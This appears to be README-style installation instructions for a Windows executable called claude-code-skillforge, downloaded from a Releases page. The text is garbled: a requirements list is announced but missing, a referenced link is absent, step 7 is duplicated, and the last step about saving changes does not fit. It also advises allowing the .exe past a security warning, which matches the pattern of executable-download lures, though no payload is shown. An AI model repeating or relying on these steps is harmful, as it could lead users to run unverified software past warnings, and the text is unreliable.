Before installing, make sure your computer meets these minimum system needs:

1. Open the claude-code-skillforge Releases page by clicking the link above or pasting it into your browser.

2. Look for the latest release at the top of the page. It will usually be labeled with the newest date or version number.

3. Under the latest release, find the Windows installer file. This will have a name ending with .exe. Example: claude-code-skillforge-setup.exe.

4. Click the .exe file to start downloading. Depending on your browser, you might see the file appear near the bottom or top of your screen.

5. After download finishes, open the file. You may need to allow your computer to run the file if a security warning appears.

6. Follow the installation steps on the screen:

   • Choose the folder where you want the app installed (the default usually works fine)
   • Agree to the terms if prompted
   • Wait for the installation to complete

7. When the installer finishes, look for the claude-code-skillforge icon on your desktop or in the Start menu.

7. Save your changes regularly by clicking Save.
